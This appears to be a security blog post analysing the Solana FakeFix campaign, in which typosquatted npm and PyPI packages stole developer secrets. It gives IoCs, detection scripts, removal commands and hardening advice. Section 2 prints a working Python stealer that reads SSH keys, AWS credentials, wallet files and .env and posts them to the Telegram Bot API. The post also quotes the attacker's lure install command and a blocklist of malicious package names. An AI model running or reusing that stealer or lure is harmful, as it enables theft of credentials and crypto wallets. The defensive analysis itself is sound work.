Solana FakeFix: 25 Malicious npm and PyPI Packages Lure Developers With Fake Stable Builds + Video


Introduction

A sophisticated supply-chain threat known as the Solana FakeFix campaign recently deployed 25 malicious packages across the npm and PyPI ecosystems, impersonating Solana SDK tooling to steal developer secrets. By exploiting install-time execution hooks and typosquatting strategies, attackers harvested Solana wallet keys, cloud credentials, SSH keys, GitHub tokens, AWS keys, environment variables, and system secrets from compromised developer environments.

Learning Objectives

  • Analyze the Solana FakeFix campaign’s attack vectors, including typosquatting, fake stable‑build fixes, and lifecycle execution.
  • Identify, detect, and remove the malicious npm and PyPI packages used in the campaign.
  • Implement defensive strategies such as lockfile pinning, dependency cooldowns, sandboxing, and credential rotation to safeguard developer workstations and CI/CD pipelines.

You Should Know

1. Why FakeFix Targets Solana Developers

Solana developers routinely search for SDKs, patched builds, community forks, and MEV tooling. The Solana FakeFix campaign exploited this by creating packages with names like @solana-labs/web3.js, @solana-labs/spl-toke, solana-web3-stable, and solana-rpc-client—names that are close enough to trusted Solana ecosystem terminology to attract developers seeking compatibility fixes. The attacker used the GitHub user PassWord1337 to open nine issues across different projects, presenting the malicious package as a community‑maintained drop‑in replacement for `@solana/web3.js` v2. The lure text suggested the following command:

npm uninstall @solana/web3.js && npm install @solana-labs/web3.js

Instead of advertising a random package, the attacker framed the malicious package as a practical compatibility fix for projects trying to stabilize their builds. The earliest npm variants used a `postinstall` lifecycle script (defined in `package.json` as { "scripts": { "postinstall": "node install.js" } }), which executed attacker‑controlled JavaScript immediately upon installation, without any import or runtime use of the library.
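The install-time hook described above is the part of the campaign a defender can check for mechanically: every package that declares `preinstall`, `install`, `postinstall` or `prepare` in its `package.json` runs a command during `npm install`, before any code is imported. The following script is an added example (not code from the original report or from any of the packages it names) that walks a `node_modules` tree and lists exactly which installed packages carry such a hook and what command they would run. It builds its own throwaway `node_modules` with invented package names so it runs offline; the `@sample-scope/web3-lookalike` and `native-addon-like` names are constructed for the demonstration.

```python
import json
import tempfile
from pathlib import Path

# Hooks npm runs automatically during `npm install`, in firing order. A package
# that declares any of them executes code before it is ever imported, which is
# exactly the FakeFix `"postinstall": "node install.js"` pattern.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def is_package_root(pkg_json: Path) -> bool:
    """True for node_modules/<name>/package.json or node_modules/@scope/<name>/package.json,
    so fixtures buried deeper inside a package are not mistaken for manifests."""
    parent = pkg_json.parent
    if parent.parent.name == "node_modules":
        return True
    return parent.parent.name.startswith("@") and parent.parent.parent.name == "node_modules"


def audit_lifecycle_scripts(node_modules: str) -> list:
    """Return every installed package that declares an install-time lifecycle
    script, together with the exact command npm would execute."""
    findings = []
    for pkg_json in sorted(Path(node_modules).rglob("package.json")):
        if not is_package_root(pkg_json):
            continue
        try:
            manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue  # unreadable or malformed manifest: skip it, do not abort the audit
        scripts = manifest.get("scripts") or {}
        hooks = {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}
        if hooks:
            findings.append({
                "name": manifest.get("name", pkg_json.parent.name),
                "version": manifest.get("version", "?"),
                "hooks": hooks,
            })
    return findings


def build_sample_node_modules() -> str:
    """Construct a throwaway node_modules tree so the audit runs offline.
    All package names and versions here are invented for the demonstration."""
    base = Path(tempfile.mkdtemp()) / "node_modules"
    samples = [
        {"name": "plain-helper", "version": "1.0.0",
         "scripts": {"test": "node test.js"}},              # benign: no install hook
        {"name": "@sample-scope/web3-lookalike", "version": "2.0.1",
         "scripts": {"postinstall": "node install.js"}},   # FakeFix-style hook
        {"name": "native-addon-like", "version": "0.3.0",
         "scripts": {"install": "node-gyp rebuild"}},      # a legitimate reason for a hook
    ]
    for manifest in samples:
        pkg_dir = base / manifest["name"]
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    # A nested package.json inside a package (test fixture) must not be reported.
    fixture_dir = base / "plain-helper" / "fixtures"
    fixture_dir.mkdir()
    (fixture_dir / "package.json").write_text(
        json.dumps({"name": "fixture", "scripts": {"postinstall": "echo fixture"}}),
        encoding="utf-8")
    return str(base)


if __name__ == "__main__":
    for finding in audit_lifecycle_scripts(build_sample_node_modules()):
        print(f"{finding['name']}@{finding['version']}: {finding['hooks']}")
```

Run it against a real project with `audit_lifecycle_scripts("./node_modules")`. A hook is not proof of malice (native add-ons need `install` to compile), so the output is a review list: each hook command should be readable and explainable, and anything of the form `node install.js` in a package you did not expect to need one deserves a look before the next install.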

2. Step‑by‑step Analysis of the Malicious Payloads

The malicious npm payload (e.g., @solana-labs/web3.js) configured a Telegram command‑and‑control (C2) channel and searched the local system for developer secrets. The embedded Telegram bot token (8628389567:AAHeoLi034Vg6J...) and chat ID (8346336575) were used to exfiltrate the following files:

– `~/.config/solana/id.json`
– `~/.solana/id.json`
– `~/.ssh/id_rsa`
– `~/.ssh/id_ed25519`
– `~/.aws/credentials`
– `$(CWD)/.env`
– `$(CWD)/wallet.json`

The PyPI packages used a different trigger mechanism: the malicious logic was placed in `__init__.py`, meaning that a simple `import` statement could start collection and persistence. The three PyPI packages shared the same compact payload and used the bot token `8870595195:AAHcwv2ZMYZU9ia_xj…` with the same chat ID `8346336575`. Below is a Python script that simulates the exfiltration logic for educational analysis:

import os
import requests

HOME = os.path.expanduser("~")
CWD = os.getcwd()

# The token is truncated in the report; the chat ID is the one shared by all packages.
BOT_TOKEN = "8870595195:AAHcwv2ZMYZU9ia_xj..."
CHAT_ID = "8346336575"

# Files the payload looked for, mirroring the list from the npm variant above.
target_files = [
    os.path.join(HOME, ".config", "solana", "id.json"),
    os.path.join(HOME, ".solana", "id.json"),
    os.path.join(HOME, ".ssh", "id_rsa"),
    os.path.join(HOME, ".ssh", "id_ed25519"),
    os.path.join(HOME, ".aws", "credentials"),
    os.path.join(CWD, ".env"),
    os.path.join(CWD, "wallet.json"),
]


def exfiltrate(file_path):
    # Each file that exists is read and posted to the Telegram Bot API as a document.
    if os.path.exists(file_path):
        with open(file_path, "r") as f:
            content = f.read()
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument"
        files = {"document": (os.path.basename(file_path), content)}
        requests.post(url, data={"chat_id": CHAT_ID}, files=files)


for target in target_files:
    exfiltrate(target)

3. Indicators of Compromise (IoCs)

Telegram C2 bots and chat IDs:

  • Bot token: `8628389567:AAHeoLi034Vg6J…` (npm)
  • Bot token: `8870595195:AAHcwv2ZMYZU9ia_xj…` (PyPI)
  • Chat ID: `8346336575`

Malicious npm packages (partial list):

– `@solana-labs/web3.js`
– `@solana-labs/spl-toke`
– `solana-web3-stable`
– `solana-rpc-client`
– `@async-mutex/mutex`
– `dexscreener`
– `solana-transaction-toolkit`
– `solana-stable-web-huks`

Malicious PyPI packages:

  • Several packages impersonating Solana tooling and using the same Telegram exfiltration channel
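The indicators in sections 2 and 3 can be turned into a file-content scan of what is already installed, which is the quickest way to answer "did any of this land on my machine?" regardless of package name. The script below is an added example (not code from the original report) that walks a directory such as `site-packages` or `node_modules`, flags files containing the Telegram Bot API endpoint, the two truncated bot-token prefixes or the shared chat ID, and grades the finding by whether the same file also references the secret paths the payload read. The sample tree it builds, including the `sample_fakefix_like` and `wallet_helper` names and their contents, is constructed for the demonstration and contains no real token.

```python
import re
import tempfile
from pathlib import Path

# Indicators from sections 2 and 3: Telegram Bot API usage, the two (truncated)
# bot-token prefixes and the chat ID shared by the npm and PyPI payloads.
TELEGRAM_API = re.compile(rb"api\.telegram\.org/bot")
BOT_TOKEN_PREFIXES = (b"8628389567:AAHeoLi034Vg6J", b"8870595195:AAHcwv2ZMYZU9ia_xj")
CHAT_ID = re.compile(rb"(?<!\d)8346336575(?!\d)")  # whole number only, not a substring of a longer one
# Files the payload read. On their own these are weak (wallet tooling reads id.json);
# next to a Telegram call in the same file they are the real signal.
SECRET_PATHS = (b".config/solana/id.json", b".solana/id.json", b".ssh/id_rsa",
                b".ssh/id_ed25519", b".aws/credentials", b"wallet.json")
SCAN_SUFFIXES = {".js", ".cjs", ".mjs", ".py"}


def classify(data: bytes) -> dict:
    """Map one file's bytes to the indicators it contains plus a severity."""
    indicators = []
    if any(prefix in data for prefix in BOT_TOKEN_PREFIXES):
        indicators.append("known-bot-token")
    if CHAT_ID.search(data):
        indicators.append("known-chat-id")
    if TELEGRAM_API.search(data):
        indicators.append("telegram-bot-api")
    secrets = [p.decode() for p in SECRET_PATHS if p in data]
    if secrets:
        indicators.append("reads-secret-paths:" + ",".join(secrets))
    if not indicators:
        return {"severity": "none", "indicators": []}
    if "known-bot-token" in indicators or "known-chat-id" in indicators:
        severity = "high"       # the campaign's own C2 identifiers
    elif "telegram-bot-api" in indicators and secrets:
        severity = "high"       # same behaviour with rotated credentials
    elif "telegram-bot-api" in indicators:
        severity = "medium"     # a Telegram client inside a dependency still needs review
    else:
        severity = "low"        # secret paths alone: likely legitimate wallet/SSH tooling
    return {"severity": severity, "indicators": indicators}


def scan_tree(root: str) -> list:
    """Scan every source file under root and return the non-clean findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix not in SCAN_SUFFIXES:
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue
        verdict = classify(data)
        if verdict["severity"] != "none":
            findings.append({"path": path.relative_to(root).as_posix(), **verdict})
    return findings


def build_sample_tree() -> str:
    """Constructed site-packages / node_modules mix; names and contents are
    invented for the demonstration and <TOKEN> is a placeholder, not a real token."""
    root = Path(tempfile.mkdtemp())
    files = {
        "site-packages/sample_fakefix_like/__init__.py":
            'import requests\nURL = "https://api.telegram.org/bot<TOKEN>/sendDocument"\n'
            'CHAT_ID = "8346336575"\nTARGETS = ["~/.ssh/id_ed25519", "~/.aws/credentials"]\n',
        "site-packages/wallet_helper/__init__.py":
            'KEYPAIR = "~/.config/solana/id.json"  # local signing only, no network\n',
        "node_modules/plain-helper/index.js":
            'module.exports = (s) => s.padStart(8);\n',
    }
    for rel, content in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding["severity"].upper(), finding["path"], finding["indicators"])
```

Point `scan_tree` at the real `site-packages` of each virtual environment and at every `node_modules` (global and per project). Treat a `high` hit as a confirmed compromise and go straight to the credential-rotation steps later in this post; a `low` hit only means a package touches key files, which is normal for wallet and SSH tooling.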

4. Detection and Removal Commands

Windows PowerShell (detection)

# Check globally installed npm packages for Solana FakeFix IoCs
npm list -g --depth=0 | Select-String "solana-labs|solana-web3-stable|solana-rpc-client|async-mutex|dexscreener|solana-transaction-toolkit"

# Check project-level npm dependencies
Get-ChildItem -Path .\node_modules -Directory | Where-Object { $_.Name -match "solana-labs|solana-web3-stable|solana-rpc-client" }

# List global pip packages (PyPI)
pip list --format=freeze | Select-String "solana"

Linux / macOS (detection and removal)

# Search global npm packages for malicious names
npm list -g --depth=0 | grep -E "(solana-labs|solana-web3-stable|solana-rpc-client|async-mutex|dexscreener|solana-transaction-toolkit)"

# Search local node_modules
find node_modules -maxdepth 1 -type d | grep -E "(solana-labs|solana-web3-stable|solana-rpc-client)"

# Remove a specific malicious npm package
npm uninstall -g @solana-labs/web3.js
npm uninstall solana-web3-stable

# List all global PyPI packages and grep for malicious names
pip3 list | grep -i solana

# Remove a malicious PyPI package
pip3 uninstall <malicious-package-name> -y
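The grep patterns above are a quick first pass, but they match substrings: `async-mutex` also matches the legitimate `async-mutex` package, while the malicious one is the scoped `@async-mutex/mutex`. The added example below (not part of the original post) does the same triage on the machine-readable output of `npm ls --depth=0 --json` and `pip list --format=json`, matching the IoC names exactly and additionally flagging lookalikes of the genuine `@solana/web3.js` and `@solana/spl-token` (same unscoped name under another scope, or a one-character edit such as `spl-toke`). The embedded JSON documents and their version numbers are constructed samples; the PyPI blocklist is left empty because the report does not name the PyPI packages.

```python
import json

# Malicious npm names from the IoC list (exact names; note the scoped @async-mutex/mutex).
MALICIOUS_NPM = {
    "@solana-labs/web3.js", "@solana-labs/spl-toke", "solana-web3-stable",
    "solana-rpc-client", "@async-mutex/mutex", "dexscreener",
    "solana-transaction-toolkit", "solana-stable-web-huks",
}
MALICIOUS_PYPI = set()  # the report does not name them; fill from your threat feed
# Genuine packages the lookalikes imitate (the real scope is @solana).
TRUSTED_NPM = {"@solana/web3.js", "@solana/spl-token"}


def parse_npm_ls(json_text: str) -> dict:
    """`npm ls --depth=0 --json` prints {"dependencies": {name: {"version": ...}}}."""
    deps = json.loads(json_text).get("dependencies", {})
    return {name: info.get("version", "?") for name, info in deps.items()}


def parse_pip_list(json_text: str) -> dict:
    """`pip list --format=json` prints [{"name": ..., "version": ...}, ...]."""
    return {row["name"]: row["version"] for row in json.loads(json_text)}


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def unscoped(name: str) -> str:
    """'@scope/pkg' -> 'pkg'; unscoped names are returned unchanged."""
    return name.split("/", 1)[1] if name.startswith("@") and "/" in name else name


def triage(installed: dict, blocklist: set, trusted: set) -> dict:
    """Return {'name@version': [reasons]} for every package that is on the
    blocklist or looks like a trusted package without being one (heuristic)."""
    verdicts = {}
    for name, version in installed.items():
        reasons = []
        if name in blocklist:
            reasons.append("known-malicious")
        if name not in trusted:
            for good in sorted(trusted):
                if levenshtein(unscoped(name), unscoped(good)) <= 1:
                    reasons.append(f"lookalike-of:{good}")
                    break
        if reasons:
            verdicts[f"{name}@{version}"] = reasons
    return verdicts


# Constructed output of `npm ls --depth=0 --json`; versions are invented.
SAMPLE_NPM_LS = json.dumps({
    "name": "demo-project", "version": "1.0.0",
    "dependencies": {
        "@solana/web3.js": {"version": "1.95.0"},       # genuine
        "@solana-labs/web3.js": {"version": "2.0.1"},   # FakeFix lookalike
        "@solana-labs/spl-toke": {"version": "0.4.3"},  # FakeFix typosquat
        "@async-mutex/mutex": {"version": "0.5.0"},     # malicious scoped name
        "async-mutex": {"version": "0.5.0"},            # legitimate, same substring
        "left-pad": {"version": "1.3.0"},
    },
})
# Constructed output of `pip list --format=json`.
SAMPLE_PIP_LIST = json.dumps([
    {"name": "solana", "version": "0.36.0"},
    {"name": "requests", "version": "2.32.0"},
])

if __name__ == "__main__":
    for pkg, reasons in triage(parse_npm_ls(SAMPLE_NPM_LS), MALICIOUS_NPM, TRUSTED_NPM).items():
        print("npm ", pkg, reasons)
    for pkg, reasons in triage(parse_pip_list(SAMPLE_PIP_LIST), MALICIOUS_PYPI, {"solana"}).items():
        print("pypi", pkg, reasons)
```

To run it on a real host, feed the script the output of `npm ls -g --depth=0 --json`, `npm ls --depth=0 --json` in each project, and `pip list --format=json` in each virtual environment. The lookalike check is a heuristic and will occasionally flag an innocent package with a one-letter-different name; the exact blocklist match is the authoritative result.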

5. Hardening Development Environments Against Supply‑Chain Attacks

Given that the FakeFix campaign leverages install‑time execution hooks and freshly published malicious versions, developers should adopt the following countermeasures:

A. Use lockfiles and strict installation

  • Always commit `package-lock.json` (npm) or `poetry.lock` (Python) to version control.
  • In CI/CD, use `npm ci` instead of `npm install` to enforce exact versions from the lockfile.

B. Enable dependency cooldowns

A minimum release age of 24 hours would have blocked the FakeFix packages during their highest‑risk window.
– pnpm 11 enables a 24‑hour Minimum Release Age by default.
– Renovate and Dependabot support configurable cooldowns.
– PMG (Package Manager Guard) offers a configurable cooldown policy.
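What a minimum release age actually does is resolve against the registry's publish timestamps rather than simply taking `latest`. The script below is an added example (not code from pnpm, Renovate, Dependabot or PMG) that applies a 24-hour cooldown to the `time` map of an npm registry package document: the newest version that is old enough wins, and anything younger is reported as held back. The registry document, the package name `sample-sdk`, its versions and the fixed clock are constructed for the demonstration, and version ordering is simplified to dotted integers (prerelease tags are not handled).

```python
from datetime import datetime, timedelta, timezone

MIN_RELEASE_AGE = timedelta(hours=24)


def parse_version(version: str) -> tuple:
    """Simplified semver ordering: dotted integers only; prerelease tags are not handled."""
    return tuple(int(part) for part in version.split("."))


def parse_registry_time(iso: str) -> datetime:
    """Registry timestamps look like 2026-03-10T09:15:00.000Z."""
    return datetime.fromisoformat(iso.replace("Z", "+00:00"))


def resolve_with_cooldown(metadata: dict, now: datetime,
                          min_age: timedelta = MIN_RELEASE_AGE) -> dict:
    """Pick the newest version published at least `min_age` before `now`.
    Returns the chosen version (None if nothing is old enough), the versions
    held back by the cooldown, and whether `latest` itself was skipped."""
    times = metadata["time"]
    latest = metadata["dist-tags"]["latest"]
    eligible, held = [], []
    for version in metadata["versions"]:
        age = now - parse_registry_time(times[version])
        (eligible if age >= min_age else held).append(version)
    return {
        "resolved": max(eligible, key=parse_version) if eligible else None,
        "held_back": sorted(held, key=parse_version),
        "latest_skipped": latest in held,
    }


# Constructed clock and registry document in the shape of an npm package metadata response.
NOW = datetime(2026, 3, 10, 12, 0, tzinfo=timezone.utc)
SAMPLE_REGISTRY_DOC = {
    "name": "sample-sdk",  # invented package
    "dist-tags": {"latest": "2.0.1"},
    "versions": {"1.4.2": {}, "2.0.0": {}, "2.0.1": {}},
    "time": {
        "created": "2025-06-01T00:00:00.000Z",
        "1.4.2": "2025-06-01T00:00:00.000Z",
        "2.0.0": "2026-02-20T09:30:00.000Z",
        "2.0.1": "2026-03-10T09:15:00.000Z",  # published 2h45m before NOW
    },
}

if __name__ == "__main__":
    decision = resolve_with_cooldown(SAMPLE_REGISTRY_DOC, NOW)
    print(f"install {decision['resolved']}; held back {decision['held_back']}; "
          f"latest skipped: {decision['latest_skipped']}")
```

The trade-off is visible in the output: a fresh version is delayed by a day, which is exactly the window in which a malicious publish is most likely to be noticed and pulled. A version that is already a day old is installed unchanged, so the control costs nothing on a stable dependency set.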

C. Install‑time package firewalls

  • Supply‑Chain Firewall by Datadog (`scfw run npm install`) blocks known‑malicious PyPI and npm packages before they execute.
  • Package Manager Guard (PMG) intercepts `npm install` and `pip install`, checks against a real‑time threat intelligence feed, and can run installations inside OS‑native sandboxes (macOS Seatbelt, Linux Landlock).

D. Disable lifecycle scripts by default

For npm (globally or per project):

# .npmrc
ignore-scripts=true

For PyPI (using a virtual environment and skipping script execution):

python -m venv --without-pip venv
# Then manually validate and install packages with a scoped permission model

For pnpm (granular allow‑list for build scripts):

# .npmrc
allowBuilds=pattern1,pattern2

6. What to Do If You Are Already Compromised

1. Isolate the affected system(s) from the network.

2. Preserve logs – retain installation logs, shell history, and package manager caches for forensics.

3. Rotate all exposed credentials, including:

  • Solana wallet keys (generate new keypairs and move funds)
  • SSH keys (replace with new key pairs and update authorized_keys)
  • AWS/GitHub API tokens and environment variables

4. Remove the malicious packages as detailed in section 4.

5. Rebuild developer machines and CI runners from trusted, clean images.

6. Review account activity for GitHub, cloud platforms, and wallet transactions.

7. Long‑Term Mitigation for Teams

Implement a software bill of materials (SBOM) and continuously monitor dependencies. Integrate malicious package detection into CI/CD pipelines using tools like SonarQube Advanced Security, which blocks builds when a confirmed malicious dependency is detected. Adopt packaging controls such as:
– Pinning dependency versions with lockfiles.
– Using pnpm with its hardened defaults (minimum release age, block exotic subdependencies, allow‑builds model).
– Running nightly scans of internal registries and mirrors for known IoCs.
– Educating developers to verify the authenticity of packages, prefer verified publishers, and avoid installing packages from external URLs or Git repositories without review.

What Undercode Say

  • Key Takeaway 1 – Supply‑chain attacks are becoming increasingly sophisticated, moving beyond simple typosquatting to sophisticated social engineering (fake GitHub issues) and cross‑ecosystem deployment (npm and PyPI simultaneously).
  • Key Takeaway 2 – The combination of install‑time execution hooks (postinstall, __init__.py) and short‑window publication strategies makes traditional reactive security insufficient; proactive, layered defenses (cooldowns, sandboxing, package firewalls) are now mandatory.

The FakeFix campaign illustrates that attackers are weaponizing the very trust and convenience that make open‑source ecosystems so powerful. For Solana developers – and indeed all developers – the era of “install first, audit later” is over. Every `npm install` or `pip install` must be treated as a potential security boundary. Defense in depth is no longer optional; it is the baseline.

Prediction

  • -1 The proliferation of AI‑generated code recommendations may increase the attack surface, as developers may unknowingly accept malicious package suggestions from generative coding assistants.
  • -1 Cross‑registry campaigns (npm, PyPI, Crates.io) will become the norm, making detection harder and requiring unified threat intelligence platforms across multiple ecosystems.
  • +1 However, the response from the industry – including package manager hardening (pnpm 11), open‑source tools (PMG, Supply‑Chain Firewall), and CI/CD integration (SonarQube) – indicates a maturing defensive posture that could substantially reduce the success rate of such attacks within 12–18 months.
  • -1 The growing financial incentive in stealing crypto wallet keys and cloud credentials ensures that threat actors will continue to evolve their techniques, possibly incorporating supply‑chain worm capabilities that automatically propagate malicious versions across a developer’s entire package publishing scope.

Reported By: Varshu25 Solana – Hackers Feeds